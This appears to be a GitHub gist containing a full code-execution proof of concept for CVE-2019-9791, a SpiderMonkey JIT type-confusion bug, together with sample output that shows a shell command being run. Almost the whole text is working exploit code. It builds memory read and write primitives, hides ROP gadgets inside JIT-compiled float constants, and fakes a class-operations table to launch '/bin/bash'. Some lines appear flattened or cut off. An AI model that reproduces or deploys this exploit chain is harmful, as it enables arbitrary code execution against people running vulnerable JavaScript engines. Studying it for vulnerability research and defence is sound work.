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Created July 29, 2019 15:04
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Code Execution PoC for CVE-2019-9791
Code Execution PoC of CVE-2019-9791 for practice of exploiting SpiderMonkey.
- Bug Finder: @saelo
- Target: 67fc2c30797036217de91cdb4b6d77a876bed7db^
- Reference:
% build-release/bin/js67 --version
% build-release/bin/js67 work/exploit-js67.js
[+] Successfully got the primitives!
[+] Successfully got more stable primitives!
[*] jitMe's entry point @ 0x5972f1318e0
[*] Searching the JIT region for the marker...
[+] The marker found @ 0x5972f131a3e
[*] Preparing a fake stack...
[*] fakeStack's backing store @ 0x7f3600b83000
[*] fakeCOps's backing store @ 0x232a41f0d3e0
[*] fakeClasp's backing store @ 0x232a41f15ee8
[*] trigger @ 0x232a41f1c938
[*]<NativeObject>->group_ @ 0x3dc8946dda30
[*]<NativeObject>->group_->clasp_ @ 0x5632b3cac4c0
[*] Executing `/bin/bash -c id`...
uid=1000(user) gid=1000(user) groups=1000(user)
function print(message) {
function info(message) {
print(`[*] ${message}`);
function success(message) {
print(`[+] ${message}`);
function fail(message) {
print(`[-] ${message}`);
function warn(message) {
print(`[!] ${message}`);
let debugging = true;
function debug(message) {
if (debugging) {
print(`[DEBUG] ${message}`);
function busywait() {
while (1);
function quit(message) {
throw new Error(message);
function breakpoint(arg) {
function gc() {
const maxMallocBytes = 128 * 1024 * 1024;
for (let i = 0; i < 3; i++) {
let x = new ArrayBuffer(maxMallocBytes);
function hex(v) {
return v.toString(16);
function hex1(v) {
return hex(v).padStart(2, '0');
function hex2(v) {
return hex(v).padStart(4, '0');
function hex4(v) {
return hex(v).padStart(8, '0');
function hex8(v) {
return hex(v).padStart(16, '0');
function hexlify(bytes) {
if (bytes instanceof Uint8Array) {
bytes = Array.from(bytes);
if (!bytes instanceof Array) {
throw new Error('Fuck!');
function unhexlify(hexstr) {
if (hexstr.length > 16 || !hexstr.match(/^([0-9A-Fa-f]{2})+$/)) {
throw new Error('Fuck!');
return Uint8Array.from(hexstr.match(/[0-9A-Fa-f]{2}/g).map(x => parseInt(x, 16)));
class Int64 {
constructor(v) {
this.bytes = new Uint8Array(8);
this.uint32view = new Uint32Array(this.bytes.buffer);
this.float64view = new Float64Array(this.bytes.buffer);
switch (typeof v) {
case 'number':
if(!Number.isSafeInteger(v)) {
throw new RangeError(`Cannot represent the number as 64-bit integer.`);
v = hex(v);
case 'string':
if (v.startsWith('0x')) {
v = v.slice(2);
this.bytes.set(unhexlify(v.padStart(16, '0')).reverse());
case 'undefined':
case 'object':
if (v instanceof Int64) {
if(v instanceof Array || v instanceof Uint8Array) {
if(v.length === 8) {
throw new TypeError(`Cannot represent ${v} as 64-bit integer.`);
asDouble() {
if(!Number.isFinite(this.float64view[0])) {
warn(`Cannot represent as double value. (${this})`);
return this.float64view[0];
asBytes() {
return Uint8Array.from(this.bytes);
byteAt(i) {
return this.bytes[i];
toString() {
if(this.uint32view[1]) {
return `0x${hex(this.uint32view[1])}${hex4(this.uint32view[0])}`;
return `0x${hex(this.uint32view[0])}`;
valueOf() {
if(this.uint32view[1]) {
warn(`The higher 32-bit is truncated. (${this})`);
return this.uint32view[0];
assignAnd(a, b) {
a = new Int64(a);
b = new Int64(b);
for (let i = 0; i < this.bytes.length; i++) {
this.bytes[i] = a.byteAt(i) & b.byteAt(i);
return this;
assignOr(a, b) {
a = new Int64(a);
b = new Int64(b);
for (let i = 0; i < this.bytes.length; i++) {
this.bytes[i] = a.byteAt(i) | b.byteAt(i);
return this;
assignXor(a, b) {
a = new Int64(a);
b = new Int64(b);
for (let i = 0; i < this.bytes.length; i++) {
this.bytes[i] = a.byteAt(i) ^ b.byteAt(i);
return this;
assignShiftLeft1(a) {
a = new Int64(a);
let carry = 0;
for (let i = 0; i < this.bytes.length; i++) {
let n = a.byteAt(i) << 1;
this.bytes[i] = n | carry;
carry = n > 0xff | 0;
return this;
assignShiftRight1(a) {
a = new Int64(a);
let borrow = 0;
for (let i = this.bytes.length; i >= 0; i--) {
let n = a.byteAt(i) >> 1;
this.bytes[i] = (borrow << 7) | n;
borrow = a.byteAt(i) & 1;
return this;
assignAdd(a, b) {
a = new Int64(a);
b = new Int64(b);
let carry = 0;
for (let i = 0; i < this.bytes.length; i++) {
let x = a.byteAt(i) + b.byteAt(i) + carry;
this.bytes[i] = x;
carry = x > 0xff | 0;
return this;
assignSub(a, b) {
a = new Int64(a);
b = new Int64(b);
let borrow = 0;
for (let i = 0; i < this.bytes.length; i++) {
let x = a.byteAt(i) - b.byteAt(i) - borrow;
this.bytes[i] = x;
borrow = x < 0 | 0;
return this;
equals(a) {
a = new Int64(a);
return this.bytes.every((x, i) => x === a.byteAt(i))
static and(a, b) {
return new Int64().assignAnd(a, b);
static or(a, b) {
return new Int64().assignOr(a, b);
static xor(a, b) {
return new Int64().assignXor(a, b);
static shiftLeft1(a) {
return new Int64().assignShiftLeft1(a);
static shiftRight1(a) {
return new Int64().assignShiftRight1(a);
static add(a, b) {
return new Int64().assignAdd(a, b);
static sub(a, b) {
return new Int64().assignSub(a, b);
static fromDouble(d) {
return new Int64(new Uint8Array(new Float64Array([d]).buffer));
const PAGE_SIZE = 0x1000;
const PAGE_ALIGN_MASK = new Int64(`0xfffffffffffff000`);
const PAGE_OFFSET_MASK = new Int64(`0xfff`);
const JSVAL_SHIFTED_TAG_OBJECT = new Int64(`0xfffe000000000000`);
function pa(addr) {
return Int64.and(addr, PAGE_ALIGN_MASK);
function po(addr) {
return Int64.and(addr, PAGE_OFFSET_MASK)|0;
function v2a(val) {
return Int64.xor(val, JSVAL_SHIFTED_TAG_OBJECT);
function a2v(addr) {
return Int64.xor(addr, JSVAL_SHIFTED_TAG_OBJECT);
// CVE-2019-9791 PoC stolen from
class Primitive {
constructor(sanityCheck=false) {
let ab = new ArrayBuffer(SIZE_HOLDING_INNER_STORE);
let victim = new Uint8Array(SIZE_HOLDING_INNER_STORE);
function Hax(val, l, trigger) {
// In the final invocation:
// Ultimately confuse these two objects which each other.
// x will (eventually) be an UnboxedObject, looking a bit like an ArrayBufferView object... :)
let x = {
slots: 13.37,
elements: 13.38,
buffer: ab,
length: 13.39,
byteOffset: 13.40,
data: []
// y is a real ArrayBufferView object.
let y = new Float64Array(SIZE_HOLDING_INNER_STORE);
// * Trigger a conversion of |this| to a NativeObject.
// * Update Hax's template type to NativeObject with .a and .x (and potentially .y)
// * Trigger the "roll back" of |this| to a NativeObject with only property .a
// * Bailout of the JITed code due to type inference changes
this.a = val;
// Trigger JIT compilation and OSR entry here. During compilation, IonMonkey will
// incorrectly assume that |this| already has the final type (so already has property .x)
for (let i = 0; i < l; i++) { }
// The JITed code will now only have a property store here and won't update the Shape.
this.x = x;
if (trigger) {
// This property definition is conditional (and rarely used) so that an inline cache
// will be emitted for it, which will inspect the Shape of |this|. As such, .y will
// be put into the same slot as .x, as the Shape of |this| only shows property .a.
this.y = y;
// At this point, .x and .y overlap, and the JITed code below believes that the slot
// for .x still stores the UnboxedObject while in reality it now stores a Float64Array.
// This assignment will then corrupt the data pointer of the Float64Array to point to |victim|. = victim;
for (let i = 0; i < 1000; i++) {
new Hax(1337, 1, false);
let obj = new Hax("dummy", 10000000, true);
this.victim = victim;
this.driver = obj.y;
this.ref = Int64.sub(Int64.fromDouble(this.driver[7]), 0x30);
if(sanityCheck) {
debug(`ref: ${this.ref}`);
let testObj = { prop: 101 };
debug(`testObj.prop: ${testObj.prop}`);
let testAddr = this.addrOf(testObj);
debug(`testObj @ 0x${testAddr}`);
let fakedObj = this.fakeObj(testAddr);
debug(`fakedObj @ 0x${this.addrOf(fakedObj)}`);
testObj.prop = 0x31337;
debug(`testObj.prop: 0x${hex(testObj.prop)}`);
debug(`fakedObj.prop: 0x${hex(fakedObj.prop)}`);
if(testObj.prop !== fakedObj.prop) {
quit(`Primitive: sanity check failed.`);
read8(addr) {
this.driver[7] = addr.asDouble();
return new Int64(this.victim.slice(0, 8));
write8(addr, data) {
this.driver[7] = addr.asDouble();
addrOf(obj) {
this.victim.prop = obj;
return v2a(this.read8(this.read8(this.ref)));
fakeObj(addr) {
this.write8(this.read8(this.ref), a2v(addr));
return this.victim.prop;
class Memory {
constructor(primitive, driver) {
let driverAddr = primitive.addrOf(driver);
let driverBufferAddr = primitive.addrOf(driver.buffer);
debug(`Memory: driver @ ${driverAddr}`);
debug(`Memory: driver.buffer @ ${driverBufferAddr}`);
let cur = 0;
for(let i = 0; i < 8; i++) {
driver.set(primitive.read8(Int64.add(driverBufferAddr, i*8)).asBytes(), cur);
cur += 8;
primitive.write8(Int64.add(driverAddr, 0x38), driverBufferAddr);
this.driver = driver;
this.ref = driverAddr;
this.curPage = new Int64(this.driver.slice(0x20, 0x28));
setPageAddr(addr) {
let pageAddr = pa(addr);
if(!this.curPage.equals(pageAddr)) {
this.driver.set(Int64.shiftRight1(pageAddr).asBytes(), 0x20);
this.curPage = pageAddr;
debug(`setPageAddr: Updated the page address to ${pageAddr}`);
read1(addr) {
return new Uint8Array(this.driver.buffer)[po(addr)];
write1(addr, byte) {
new Uint8Array(this.driver.buffer).set([byte], po(addr));
read8(addr) {
return new Int64(new Uint8Array(this.driver.buffer, po(addr), 8));
write8(addr, data) {
new Uint8Array(this.driver.buffer, po(addr), 8).set(data.asBytes());
search8(startAddr, value, length) {
for (let i = 0; i < length; i++) {
let addr = Int64.add(startAddr, i);
let data = this.read8(addr);
debug(`${addr}: ${hexlify(data.asBytes())}`);
if (data.equals(value)) {
return addr;
return null;
writeString(addr, str) {
for(let i = 0; i < str.length; i++) {
this.write1(Int64.add(addr, i), str.charCodeAt(i));
this.write1(Int64.add(addr, str.length), 0);
addrOf(obj) {
this.driver.prop = obj;
return v2a(this.read8(this.read8(Int64.add(this.ref, 0x10))));
function pwn() {
// 0. Create a memory viewer for AAR/AAW used later and move it to Tenuered region by invoking GC.
let driver = new Uint8Array(0x1000);
// 1. Get **unstable** AAR/AAW/addrOf by abusing CVE-2019-9791.
let primitive = new Primitive(sanityCheck=true);
success(`Successfully got the primitives!`);
// 2. Achieve stable AAR/AAW by using the primitives above.
let memory = new Memory(primitive, driver);
success(`Successfully got more stable primitives!`);
// 3. Get a native code execution.
// 3.1 Prepare a function which contains ROP gadgets in the middle of an intended instructions and make it JIT by executing continuously.
const MARKER = new Int64('0x1337133713371337');
function jitMe() {
const marker = 4.183559446463817e-216;
.quad 0x1337133713371337
const payload1 = 2.487827767156337e-275;
mov rsp, [rsp+0x20]
jmp $+8
const payload2 = -6.911007558471272e-229;
mov rbp, [rsp]
const payload3 = 2.5047758127751096e-275;
pop rdi
pop rsi
xor edx, edx
xor eax, eax
jmp $+8
const payload4 = 4.1938381e-316;
add al, 0x3b
for (let i = 0; i < 100; i++) {
// 3.2 Walks the JIT region to find the marker.
let jitMeEntryPointAddr = memory.read8(memory.read8(Int64.add(memory.addrOf(jitMe), 0x30)));
info(`jitMe's entry point @ ${jitMeEntryPointAddr}`);
info(`Searching the JIT region for the marker...`);
let payloadEntryPoint = memory.search8(jitMeEntryPointAddr, MARKER, PAGE_SIZE);
if (payloadEntryPoint === null) {
quit(`Could not find the marker...`);
payloadEntryPoint = Int64.add(payloadEntryPoint, 0xe);
success(`The marker found @ ${payloadEntryPoint}`);
// 3.3 Create a fake stack and put ROP chains.
info(`Preparing a fake stack...`);
let fakeStack = new Uint8Array(PAGE_SIZE);
fakeStackBackingStoreAddr = memory.read8(Int64.add(memory.addrOf(fakeStack), 0x38));
info(`fakeStack's backing store @ ${fakeStackBackingStoreAddr}`);
let argv = [
fakeStackContents = [
Int64.add(payloadEntryPoint, 0xe*2), // return address
null, // RDI
null, // RSI
null, // argv[0]
null, // argv[1]
null, // argv[2]
new Int64(), // NULL
let argvAddrOnFakeStack = Int64.add(fakeStackBackingStoreAddr, fakeStackContents.length*8);
fakeStackContents[1] = argvAddrOnFakeStack;
fakeStackContents[2] = Int64.add(fakeStackBackingStoreAddr, 3*8);
let pos = 0;
for(let i = 0; i < argv.length; i++) {
let addr = Int64.add(argvAddrOnFakeStack, pos);
memory.writeString(addr, argv[i]);
fakeStackContents[i+3] = addr;
pos += argv[i].length + 1; // including NUL byte.
for (let i = 0; i < fakeStackContents.length; i++) {
memory.write8(Int64.add(fakeStackBackingStoreAddr, i*8), fakeStackContents[i]);
// 3.4 Create fake cops and clasp of Uint8Array.
let fakeCOps = new Uint8Array(11 * 8);
let fakeCOpsBackingStoreAddr = memory.read8(Int64.add(memory.addrOf(fakeCOps), 0x38));
info(`fakeCOps's backing store @ ${fakeCOpsBackingStoreAddr}`);
memory.write8(Int64.add(fakeCOpsBackingStoreAddr, 0x20), payloadEntryPoint);
let fakeClasp = new Uint8Array(6 * 8);
let fakeClaspBackingStoreAddr = memory.read8(Int64.add(memory.addrOf(fakeClasp), 0x38));
info(`fakeClasp's backing store @ ${fakeClaspBackingStoreAddr}`);
let trigger = new Uint8Array(1);
let triggerAddr = memory.addrOf(trigger);
info(`trigger @ ${triggerAddr}`);
let triggerObjectGroupAddr = memory.read8(triggerAddr);
info(`<NativeObject>->group_ @ ${triggerObjectGroupAddr}`);
let triggerClaspAddr = memory.read8(triggerObjectGroupAddr);
info(`<NativeObject>->group_->clasp_ @ ${triggerClaspAddr}`);
for (let i = 0; i < fakeClasp.length; i += 0x8) {
if (i == 0x10) {
memory.write8(Int64.add(fakeClaspBackingStoreAddr, i), fakeCOpsBackingStoreAddr);
} else {
memory.write8(Int64.add(fakeClaspBackingStoreAddr, i), memory.read8(Int64.add(triggerClaspAddr, i)));
// 4. Trigger the ROP sequence!
memory.write8(triggerObjectGroupAddr, fakeClaspBackingStoreAddr);
info(`Executing \`${argv.join(' ')}\`...`);
trigger.bang = Int64.sub(fakeStackBackingStoreAddr, 0x8).asDouble();
function main() {
debugging = false;
try {
} catch (e) {
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